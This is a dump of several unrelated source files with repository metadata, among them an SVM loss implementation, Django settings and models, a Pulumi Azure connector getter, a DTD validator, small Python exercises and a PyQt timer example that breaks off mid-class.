f908e937a19b718a4c2843454a515a8c29e473d4 | 78a5b5bbe96843027b7117b4d99cfecc959f3068 | /assignment1/cs231n/classifiers/linear_svm.py | 8bdfa5d633d01e31248d38793b884644f9b71d8e | [] | no_license | chengxiu2008/deep_learning | a306206cf14c74d8585024ddacee1d614c60a606 | 5f3ee03a3e04a8737d177c5d95ee3103b9fe92bf | refs/heads/master | 2020-03-17T11:44:12.914878 | 2018-07-25T17:13:01 | 2018-07-25T17:13:01 | 133,558,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,086 | py | import numpy as np
from random import shuffle
from past.builtins import xrange
def svm_loss_naive(W, X, y, reg):
    """
    Structured SVM loss function, naive implementation (with loops).

    Inputs have dimension D, there are C classes, and we operate on
    minibatches of N examples.

    Inputs:
    - W: A numpy array of shape (D, C) containing weights.
    - X: A numpy array of shape (N, D) containing a minibatch of data.
    - y: A numpy array of shape (N,) containing training labels; y[i] = c
      means that X[i] has label c, where 0 <= c < C.
    - reg: (float) regularization strength

    Returns a tuple of:
    - loss as single float
    - gradient with respect to weights W; an array of same shape as W
    """
    dW = np.zeros(W.shape)  # gradient accumulator, same shape as W

    num_classes = W.shape[1]
    num_train = X.shape[0]
    loss = 0.0
    # FIX: use the built-in range() instead of past.builtins.xrange — the
    # Python 2 compatibility shim behaves identically on Python 3 and drops
    # the dependency on ``past``.
    for i in range(num_train):
        scores = X[i].dot(W)
        correct_class_score = scores[y[i]]
        diff_count = 0  # how many classes violated the margin for sample i
        for j in range(num_classes):
            if j == y[i]:
                continue
            margin = scores[j] - correct_class_score + 1  # note delta = 1
            if margin > 0:
                loss += margin
                diff_count += 1
                dW[:, j] += X[i]  # each violating class pushes its weights up
        # The correct class is pushed down once per violated margin.
        dW[:, y[i]] -= diff_count * X[i]

    # Average over the batch, then add L2 regularization (and its gradient).
    loss /= num_train
    loss += 0.5 * reg * np.sum(W * W)
    dW /= num_train
    dW += reg * W
    return loss, dW
def svm_loss_vectorized(W, X, y, reg):
    """
    Structured SVM loss function, vectorized implementation.

    Inputs and outputs are the same as svm_loss_naive.
    """
    num_train = X.shape[0]
    delta = 1.0

    # Scores for every sample/class pair: (N, C).
    scores = X.dot(W)
    # Score of each sample's correct class: (N,).
    correct_class_scores = scores[np.arange(num_train), y]
    # Hinge margins, clamped at zero; then zero out the correct-class column.
    # FIX: the original applied np.maximum a second time afterwards, which was
    # redundant — the margins are already non-negative at this point.
    margins = np.maximum(0, scores - correct_class_scores[:, np.newaxis] + delta)
    margins[np.arange(num_train), y] = 0

    loss = np.sum(margins) / num_train + 0.5 * reg * np.sum(W * W)

    # Gradient coefficients: 1 for every violated (sample, class) pair, and
    # minus the per-sample violation count in the correct-class column.
    # (The y-column of ``margins`` is already zero, so the row sum counts
    # only the violations.)
    coeff = (margins > 0).astype(float)
    coeff[np.arange(num_train), y] = -coeff.sum(axis=1)
    # FIX: compute (D, N) x (N, C) -> (D, C) directly instead of the
    # original's transpose / dot / transpose-back dance.
    dW = X.T.dot(coeff) / num_train + reg * W
    return loss, dW
| [
"noreply@github.com"
] | noreply@github.com |
eeeed493d28fcc8c9819e0034e50ac7b62315780 | c3e39cfa32c749e1517d2e5be7cc95743daf0ffe | /PycharmProjects/Python Tutorial/PersonClass.py | e4faffe5f3ef9683ade51b60d2a6dc9989afdc59 | [] | no_license | priyasjoshi/Python | 940871bbe207f15315e25b9183d190a730f80d91 | c6a3ee2dbbb73b1e2f22ad3628dcc206dd1d1fc2 | refs/heads/master | 2022-11-04T04:27:16.439798 | 2019-06-21T05:50:05 | 2019-06-21T05:50:05 | 193,037,122 | 0 | 1 | null | 2022-10-31T06:53:27 | 2019-06-21T05:38:21 | Python | UTF-8 | Python | false | false | 848 | py | import datetime
class Person:
    """A person whose age in whole years is derived from ``birthdate``.

    The age is cached and refreshed lazily: reading ``age`` recomputes it
    only when the calendar date has advanced since the last calculation.
    """

    def __init__(self, name, birthdate):
        self.name = name
        self.birthdate = birthdate
        self._age = None
        self._age_last_calculated = None
        self.recalculate_age()

    def recalculate_age(self):
        """Recompute the cached age and remember the date we computed it."""
        today = datetime.date.today()
        age = today.year - self.birthdate.year
        # Subtract one if this year's birthday has not happened yet.
        if today < datetime.date(today.year, self.birthdate.month, self.birthdate.day):
            age -= 1
        # BUG FIX: the original assigned ``self.age`` / ``self.age_last_calculated``,
        # shadowing the accessor and leaving the private cache fields as None
        # (which made the original ``age()`` method crash when comparing dates).
        self._age = age
        self._age_last_calculated = today

    @property
    def age(self):
        """Age in whole years; ``person.age`` attribute access is preserved."""
        if datetime.date.today() > self._age_last_calculated:
            self.recalculate_age()
        return self._age

    def __str__(self):
        return "string"
# Build a sample Person and exercise the public attributes.
person = Person(
    "Jane",
    datetime.date(1990,7,26)
)
print(person.__str__())  # same as print(person)
print(person.name)
print(person.age)
"priyujoshi10@gmail.com"
] | priyujoshi10@gmail.com |
b8a648e695ffd41107411a2a06894c584e2e6f86 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/securityinsights/v20210301preview/get_dynamics365_data_connector.py | aab4cce733e30b9d124ff6383db6269c8390a7b0 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 5,892 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetDynamics365DataConnectorResult',
'AwaitableGetDynamics365DataConnectorResult',
'get_dynamics365_data_connector',
]
@pulumi.output_type
class GetDynamics365DataConnectorResult:
    """
    Represents Dynamics365 data connector.
    """
    # Generated by the Pulumi SDK Generator (see the file header): the
    # constructor defensively validates each field coming off the wire and
    # stashes it on the instance via pulumi.set; properties read it back.
    # NOTE(review): parameters ``id`` and ``type`` shadow Python builtins,
    # but the names are fixed by the generated API surface.
    def __init__(__self__, data_types=None, etag=None, id=None, kind=None, name=None, system_data=None, tenant_id=None, type=None):
        if data_types and not isinstance(data_types, dict):
            raise TypeError("Expected argument 'data_types' to be a dict")
        pulumi.set(__self__, "data_types", data_types)
        if etag and not isinstance(etag, str):
            raise TypeError("Expected argument 'etag' to be a str")
        pulumi.set(__self__, "etag", etag)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if kind and not isinstance(kind, str):
            raise TypeError("Expected argument 'kind' to be a str")
        pulumi.set(__self__, "kind", kind)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if system_data and not isinstance(system_data, dict):
            raise TypeError("Expected argument 'system_data' to be a dict")
        pulumi.set(__self__, "system_data", system_data)
        if tenant_id and not isinstance(tenant_id, str):
            raise TypeError("Expected argument 'tenant_id' to be a str")
        pulumi.set(__self__, "tenant_id", tenant_id)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="dataTypes")
    def data_types(self) -> 'outputs.Dynamics365DataConnectorDataTypesResponse':
        """
        The available data types for the connector.
        """
        return pulumi.get(self, "data_types")
    @property
    @pulumi.getter
    def etag(self) -> Optional[str]:
        """
        Etag of the azure resource
        """
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Azure resource Id
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter
    def kind(self) -> str:
        """
        The kind of the data connector
        Expected value is 'Dynamics365'.
        """
        return pulumi.get(self, "kind")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Azure resource name
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> 'outputs.SystemDataResponse':
        """
        Azure Resource Manager metadata containing createdBy and modifiedBy information.
        """
        return pulumi.get(self, "system_data")
    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> str:
        """
        The tenant id to connect to, and get the data from.
        """
        return pulumi.get(self, "tenant_id")
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Azure resource type
        """
        return pulumi.get(self, "type")
class AwaitableGetDynamics365DataConnectorResult(GetDynamics365DataConnectorResult):
    # Awaitable shim: lets callers ``await`` the (already resolved) result.
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable ``yield`` makes this method a generator (hence the
        # object is awaitable); it returns a plain result without suspending.
        if False:
            yield self
        return GetDynamics365DataConnectorResult(
            data_types=self.data_types,
            etag=self.etag,
            id=self.id,
            kind=self.kind,
            name=self.name,
            system_data=self.system_data,
            tenant_id=self.tenant_id,
            type=self.type)
def get_dynamics365_data_connector(data_connector_id: Optional[str] = None,
                                   operational_insights_resource_provider: Optional[str] = None,
                                   resource_group_name: Optional[str] = None,
                                   workspace_name: Optional[str] = None,
                                   opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDynamics365DataConnectorResult:
    """
    Represents Dynamics365 data connector.


    :param str data_connector_id: Connector ID
    :param str operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
    :param str resource_group_name: The name of the resource group. The name is case insensitive.
    :param str workspace_name: The name of the workspace.
    """
    # Wire-format (camelCase) argument names expected by the provider.
    __args__ = dict()
    __args__['dataConnectorId'] = data_connector_id
    __args__['operationalInsightsResourceProvider'] = operational_insights_resource_provider
    __args__['resourceGroupName'] = resource_group_name
    __args__['workspaceName'] = workspace_name
    # Default the invoke options and pin the SDK version when unset.
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider function and unwrap the typed result value.
    __ret__ = pulumi.runtime.invoke('azure-native:securityinsights/v20210301preview:getDynamics365DataConnector', __args__, opts=opts, typ=GetDynamics365DataConnectorResult).value

    return AwaitableGetDynamics365DataConnectorResult(
        data_types=__ret__.data_types,
        etag=__ret__.etag,
        id=__ret__.id,
        kind=__ret__.kind,
        name=__ret__.name,
        system_data=__ret__.system_data,
        tenant_id=__ret__.tenant_id,
        type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
3216fe50f659f9555182cd6e9010327a99bc736c | 50c2bf03543eff23ec2e88f086e33848b50b5c4f | /docs/links.py | 7fb1ce92193eab8aaee889f6876ac192227aa78d | [] | no_license | CiscoTestAutomation/geniefiletransferutilslib | d06967476d78eafe1984a9991a57def25523ade7 | 9c32f121816d7d8f4a1fc4fc1b7c2fe0cf4e9449 | refs/heads/master | 2021-06-03T21:04:24.922438 | 2020-01-20T19:36:53 | 2020-01-20T19:36:53 | 131,624,514 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py |
# Documentation link maps: each entry is name -> (url_template, display_text).
# The '%s' placeholder appears to be filled with the URL scheme (note the
# external map uses '%ss://', which would yield 'https' from 'http') and, for
# the mailto entries, with the mail domain — TODO confirm against the docs
# build code that consumes these maps.
internal_links = {'pyats': ('%s://wwwin-pyats.cisco.com', 'pyATS'),
                  'devnet': ('%s://developer.cisco.com/', 'Cisco DevNet'),
                  'multiprotocolfileutilities': ('%s://wwwin-pyats.cisco.com/documentation/html/utilities/file_transfer_utilities.html', 'Multiprotocol File Transfer'),
                  'mailto': ('mailto:asg-genie-support@%s','mailto'),
                  'communityforum': ('%s://piestack.cisco.com', 'community forum'),
                  }

# Public (external) equivalents of the same link names.
external_links = {'pyats': ('%ss://developer.cisco.com/site/pyats/', 'pyATS'),
                  'devnet': ('%ss://developer.cisco.com/', 'Cisco DevNet'),
                  'multiprotocolfileutilities': ('%ss://pubhub.devnetcloud.com/media/pyats/docs/utilities/file_transfer_utilities.html', 'Multiprotocol File Transfer'),
                  'mailto': ('mailto:pyats-support-ext@%s','mailto'),
                  'communityforum': ('%ss://communities.cisco.com/community/developer/pyats', 'community forum'),
                  }
| [
"karmoham@cisco.com"
] | karmoham@cisco.com |
cf70dfa5d43d48127e293a0c5dd35957a50a8c06 | 85a60a4ca26f0d38968f7b3746e72e38bae84a18 | /db/base_modle.py | 2c3c5a4d4c78e96bb2e0e4dfb593102700bae422 | [] | no_license | zht-AHTVU/daliyfresh | 3e5bbab9242ede92433da5067ae17dcb1de16f70 | 125579511de9fa6dfb27d2a05b088b20f8205858 | refs/heads/master | 2020-05-25T19:13:52.205338 | 2019-06-02T04:14:43 | 2019-06-02T04:14:43 | 187,945,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from django.db import models
class BaseModel(models.Model):
    """Abstract base model providing common audit fields.

    Fields:
        create_time: timestamp set once, when the row is first inserted.
        up_date_time: timestamp refreshed on every save.
        is_delete: soft-delete flag; rows are marked deleted, not removed.
    """

    # Bug fix: creation time must use auto_now_add (set only on insert).
    # The original used auto_now=True, which silently overwrote the
    # creation timestamp on every save.
    create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
    up_date_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
    is_delete = models.BooleanField(default=False, verbose_name='删除标记')

    class Meta:
        # Abstract model class: no table is created for BaseModel itself;
        # subclasses inherit the fields above.
        abstract = True
| [
"zhangting@ahou.edu.cn"
] | zhangting@ahou.edu.cn |
ec729ccc29e9f141219a60fe2ab62d58e727803f | fafbbc387a587ba7f8cdb2c6cbca7d7cc1b89f1f | /model/model/settings.py | db5eb87ded543f8aed0caef21fe952f748ca8738 | [] | no_license | anaroja/Django_projects | 3e54652af304b56be9775f1f0287717524a795fa | 1043e69201db5719559599291d7025cf21203f05 | refs/heads/master | 2020-03-09T21:24:09.572508 | 2018-04-13T23:16:37 | 2018-04-13T23:16:37 | 129,008,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | """
Django settings for model project.
Generated by 'django-admin startproject' using Django 1.11.12.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before deploying anywhere public.
SECRET_KEY = 'u$)@d7#dh595_5lo!c2uqn(e(hnl^00rw2km^ros@-9e#oel(#'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty while developing; must list served hostnames once DEBUG is False.
ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    # Project app registered ahead of the Django contrib apps.
    'apps.mod',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'model.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # No project-level template dirs; templates live inside each app
        # (APP_DIRS=True below).
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'model.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# Default development database: a local SQLite file next to the project.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/

STATIC_URL = '/static/'
"anaroja@amazon.com"
] | anaroja@amazon.com |
db25637737ba7e8275ff2519978809d8f69adc0e | 961cc32229fa31592f85e3ee84626b25f739a507 | /contraladorGastos.py | 2c78598688d0c3fbb14853f3513877831b560c56 | [] | no_license | ElaineVicente/ExerciciosPython | 7025db0aefd21986aea0c4b977c7e89d5bf7f3a8 | ad7ca55335d60a5f3b273113c7b14193c57b6235 | refs/heads/main | 2023-04-18T20:59:47.026863 | 2021-04-26T00:58:18 | 2021-04-26T00:58:18 | 361,571,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | qt_transacoes = int(input("Digite a quantidade de transações realizadas "))
# Accumulate the running total; the average is derived once after the
# loop instead of being recomputed on every iteration (the original also
# carried an unused counter `i` and commented-out dead code).
valor_total = 0
for _ in range(qt_transacoes):
    valor_transacao = int(input("Digite o valor da transação "))
    valor_total = valor_total + valor_transacao
# Guard against division by zero when no transactions were entered
# (the original's in-loop average also reported 0 in that case).
media_total = valor_total / qt_transacoes if qt_transacoes > 0 else 0
print("Média das transações é: ", media_total)
print("Valor total gasto = ", valor_total)
| [
"elainevicentesouza@gmail.com"
] | elainevicentesouza@gmail.com |
858a53123632c2341a8d43156ec562807a7a9d52 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_205/ch139_2020_04_01_19_45_57_332549.py | 850ba88067b364259c8a558e3cceaab56293684b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py |
def arcotangente(x, n):
    """Approximate atan(x) via the truncated Taylor series
    x - x**3/3 + x**5/5 - ..., using every odd exponent below n.
    """
    total = x
    sign = -1
    exp = 3
    while exp < n:
        # Each term is sign * x**exp / exp; the exponent and the divisor
        # are always the same odd number, so a single counter suffices.
        total += sign * (x ** exp / exp)
        sign = -sign
        exp += 2
    return total
"you@example.com"
] | you@example.com |
ff9187fa987aa771ad4a15e06fd8b50ed0b35bbb | bac2fb7ae9a5997cb25774a3e808673acc6fbdc0 | /oconsole.spec | 9b72fbbd4b54558300334932c4948ca68bc24078 | [] | no_license | EarthBugs/ThreadSimulator | dd3998206fc945c9644717b32ee1e99ece0e4025 | df661bf3df6e3cf2e8afd572fc2d79f0fd79db70 | refs/heads/master | 2023-06-04T13:02:26.482950 | 2021-07-03T14:42:29 | 2021-07-03T14:42:29 | 382,634,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | spec | # -*- mode: python ; coding: utf-8 -*-
# PyInstaller build spec.  The names Analysis, PYZ and EXE are injected into
# this file's namespace by PyInstaller when it executes the spec -- they are
# not Python imports, so this file cannot be run standalone.

# No bytecode encryption is used.
block_cipher = None

a = Analysis(['Main.py'],
             # NOTE(review): absolute Windows path; rebuilding on another
             # machine requires adjusting (or removing) this entry.
             pathex=['D:\\Project\\Programming\\PythonProjects\\ThreadSimulator'],
             binaries=[],
             datas=[],
             # Listed explicitly, presumably because static analysis misses
             # it (loaded dynamically by Qt) -- confirm if the build breaks.
             hiddenimports=['PySide2.QtXml'],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher,
             noarchive=False)

pyz = PYZ(a.pure, a.zipped_data,
          cipher=block_cipher)

# One-file console executable named 'oconsole' (runtime_tmpdir=None means
# the bootloader unpacks to a temporary directory at launch).
exe = EXE(pyz,
          a.scripts,
          a.binaries,
          a.zipfiles,
          a.datas,
          [],
          name='oconsole',
          debug=False,
          bootloader_ignore_signals=False,
          strip=False,
          upx=True,
          upx_exclude=[],
          runtime_tmpdir=None,
          console=True)
| [
"TknHJQ@qq.com"
] | TknHJQ@qq.com |
6b3e19b3c633b7ce0aa72c220770ab72ab12a828 | 6a0589aa1a5f9071cbcee3f84452c880bf96c12d | /tests/conftest.py | 1b5dcb8b25e52d3f3937e03f61d604e1bf155437 | [
"MIT"
] | permissive | UWPCE-PythonCert/py220_extras | d3203e2fd44ee840d008fac9597a5b0c165e8cc7 | 57336429fb782c4901e7709c0275242e6af4264a | refs/heads/master | 2020-12-01T23:42:58.660565 | 2020-03-11T02:44:18 | 2020-03-11T02:44:18 | 230,816,756 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | # -*- coding: utf-8 -*-
"""
Dummy conftest.py for uw_py220_extras.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
# import pytest
| [
"akmiles@icloud.com"
] | akmiles@icloud.com |
d5273fc4c826924fa2f91bac2446187315ca100f | 310fa7c3307a00b744d84734c8b52fd6f0e4d50c | /tags.py | d4b334b8a106356f90d48116d3f4428aca00ecdd | [
"MIT",
"CC-BY-3.0-US",
"GPL-1.0-or-later",
"BSD-3-Clause",
"OFL-1.1",
"WTFPL"
] | permissive | martinapugliese/martinapugliese.github.io | 116c1976b2613b2709c8a0e701dcd8584319cc21 | fd9fc4a28dfcad4c8f52b15134af7c38c80d2039 | refs/heads/master | 2023-09-04T11:08:04.600248 | 2023-09-03T10:42:52 | 2023-09-03T10:42:52 | 69,119,434 | 4 | 5 | MIT | 2023-08-12T10:09:34 | 2016-09-24T18:11:06 | SCSS | UTF-8 | Python | false | false | 646 | py | # lil' script to fetch all tags on posts (outside of categories ones)
# to see which ones have already been used and to which extent
import os
from collections import Counter
# Collect every tag line found in the front matter of each post, then
# print the tag frequencies.
tags = []
# Skip macOS Finder droppings such as .DS_Store.
filenames = [item for item in os.listdir('_posts') if '.DS_' not in item]
for filename in filenames:
    # Use a context manager so each post's file handle is closed promptly
    # (the original opened files in a loop without ever closing them).
    with open('_posts/' + filename) as post:
        content = post.readlines()
    for i, line in enumerate(content):
        # Stop at the closing '---' of the YAML front matter; the opening
        # '---' is on line 0 and is excluded by the i > 0 check.
        if '---' in line and i > 0:
            break
        # A tag line looks like ' - name'; skip delimiters and comments.
        if ' - ' in line and '---' not in line and '#' not in line:
            tags.append(line.replace('\n', ''))

c = Counter(tags)
print(c.most_common())
| [
"m.letitbe@gmail.com"
] | m.letitbe@gmail.com |
1c3727643167dbc90fdee63c457b06770635f3fb | b9d720f7fdb5c4ff927c2579a7033b27683b620d | /main_module.py | 31c2aecc9b3200afd7f06318b0da1dc9837ba66f | [] | no_license | koh1979/bottest01 | cc419a4d6ab5ed68669f027339d9d3b71d99f453 | c624019dc8b31371556745fb06d12762579c5ce1 | refs/heads/master | 2022-12-31T02:00:08.239762 | 2020-10-16T16:35:00 | 2020-10-16T16:35:00 | 304,662,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | def test():
print('module test') | [
"piriya.ng@gmail.com"
] | piriya.ng@gmail.com |
c364f65a620c15ad847eea7738a9b68dceef4c9c | a2c22f562d824e7f866b0904fd474aeb84db893d | /xmltool/dtd.py | 7021a5fd41723579c7ddfc324b24db1040f61882 | [
"MIT"
] | permissive | LeResKP/xmltool | d823428fe2b62fea3d05ea7863e59b8d76aa5206 | 178d54a8d8d2c80a6ce4b96eb5030fa7fea5b62b | refs/heads/develop | 2021-05-17T19:51:49.445632 | 2019-04-03T05:42:26 | 2020-07-21T14:58:32 | 6,756,118 | 6 | 2 | MIT | 2021-03-02T17:30:28 | 2012-11-19T06:52:37 | Python | UTF-8 | Python | false | false | 4,665 | py | from io import StringIO, open
from dogpile.cache.api import NO_VALUE
from lxml import etree
import os
import requests
import six
import tempfile
from . import dtd_parser
from . import cache
class ValidationError(Exception):
    """Raised when a DTD (or a document checked against it) is invalid."""
class DTD(object):
    """Wrapper around a DTD resource (HTTP(S) URL, filesystem path, or an
    in-memory StringIO).

    Handles fetching, (optional dogpile.cache) caching, parsing via
    dtd_parser, validating the DTD itself, and validating XML documents
    against it.
    """

    def __init__(self, url, path=None):
        """
        url: the url to get the dtd, it can be http or filesystem resources
        path is used in case the dtd use relative filesystem path
        """
        self._parsed_dict = None
        if isinstance(url, StringIO):
            # In-memory DTD: no URL, content is taken directly from the
            # buffer and validated eagerly.
            self.url = None
            # set _content and validation
            # self_content should be str
            self._content = url.getvalue()
            self.validate()
        else:
            # Lazy mode: content is fetched on first access of .content.
            self.url = url
            self.path = path
            self._content = None

    def _get_dtd_url(self):
        """Return the effective URL/path, resolving relative paths
        against self.path."""
        if self.url.startswith('http://') or self.url.startswith('https://'):
            return self.url
        url = self.url
        # Join only when the path is relative and not already prefixed.
        if (self.path and
                not self.url.startswith('/') and
                not self.url.startswith(self.path)):
            url = os.path.join(self.path, self.url)
        return url

    def _fetch(self):
        """Fetch the dtd content
        """
        url = self._get_dtd_url()
        if url.startswith('http://') or url.startswith('https://'):
            # NOTE(review): res.status_code is not checked; an HTTP error
            # page would be treated as DTD content until validation fails.
            res = requests.get(url, timeout=5)
            # Use res.text to have str
            self._content = res.text
        else:
            # TODO: Get encoding from the dtd file (xml tag).
            self._content = open(url, 'r').read()
        return self._content

    @property
    def content(self):
        """The dtd content
        """
        if self._content:
            return self._content
        if cache.CACHE_TIMEOUT is None:
            # Caching disabled: always fetch.
            return self._fetch()
        # Cached path requires a URL to build a stable cache key.
        assert(self.url)
        cache_key = 'xmltool.get_dtd_content.%s' % (self._get_dtd_url())
        value = cache.region.get(cache_key, cache.CACHE_TIMEOUT)
        if value is not NO_VALUE:
            return value
        content = self._fetch()
        # Only cache content that passed validation.
        self.validate()
        cache.region.set(cache_key, content)
        return content

    def validate(self):
        """Validate the dtd is valid.

        It raises a ValidationError exception when not valid.
        It also can raise etree.ParseError if the dtd is unparsable.
        """
        # Be careful when getting the content we can have a recursive loop
        # since we validate the dtd when getting it. But we also want to be
        # able to validate a dtd before we fetch the content.
        content = self._content if self._content else self.content
        f, filename = tempfile.mkstemp()
        # Don't know why but the validation doesn't work using a StringIO so we
        # write a temporary file
        try:
            try:
                # TODO: Get encoding from the dtd file (xml tag).
                os.write(f, content.encode('utf-8'))
            finally:
                os.close(f)
            dtd_obj = etree.DTD(filename)
        finally:
            os.remove(filename)
        if dtd_obj.error_log:
            raise ValidationError(dtd_obj.error_log)
        # It can raise an exception if something is wrong in the dtd
        # For example, etree.DTD doesn't raise exception if a sub element is
        # not defined, self.parse does.
        self.parse()

    def _parse(self):
        """Parse the DTD content into the element classes dict
        (uncached worker for parse())."""
        dtd_dict = dtd_parser.dtd_to_dict_v2(self.content)
        self._parsed_dict = dtd_parser._create_classes(dtd_dict)
        return self._parsed_dict

    def parse(self):
        """Return the parsed element classes dict, using the memoized value
        or the shared cache region when available."""
        if self._parsed_dict:
            return self._parsed_dict
        if cache.CACHE_TIMEOUT is None:
            return self._parse()
        # Precedence note: this is ('xmltool.parse.%s' % self.url) when
        # self.url is set, else None (StringIO-backed DTDs are not cached).
        cache_key = 'xmltool.parse.%s' % self.url if self.url else None
        if not cache_key:
            return self._parse()
        value = cache.region.get(cache_key, cache.CACHE_TIMEOUT)
        if value is not NO_VALUE:
            return value
        value = self._parse()
        cache.region.set(cache_key, value)
        return value

    def validate_xml(self, xml_obj):
        """Validate an XML object against this DTD.

        :param xml_obj: The XML object to validate
        :type xml_obj: etree.Element
        :return: True. Raise an exception if the XML is not valid
        :rtype: bool
        """
        # Make sure the dtd is valid
        self.validate()
        # We should cache the etree.DTD in the object
        dtd_obj = etree.DTD(StringIO(self.content))
        dtd_obj.assertValid(xml_obj)
        return True
| [
"a.matouillot@gmail.com"
] | a.matouillot@gmail.com |
dfeb29a64581f84d9e2ab512576acb3bf5fbf769 | 51aa2894c317f60726fe9a778999eb7851b6be3e | /140_gui/pyqt_pyside/examples/PyQt_PySide_book/002_Processing_of_signals_and_events/+21_Handling signal and slot/21_9_Using class QTimer.py | d3b27afda8a2731f5c7749a149ae85dd10462344 | [] | no_license | pranaymate/Python_Topics | dd7b288ab0f5bbee71d57080179d6481aae17304 | 33d29e0a5bf4cde104f9c7f0693cf9897f3f2101 | refs/heads/master | 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,608 | py | # -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
import time
class MyWindow(QtGui.QWidget):
    """Demo window with a clock label driven by a QTimer.

    "Запустить" (Start) arms a 1-second timer, "Остановить" (Stop) disarms
    it; each timeout refreshes the label with the current time.  The
    user-visible strings are Russian, as in the original tutorial.
    """

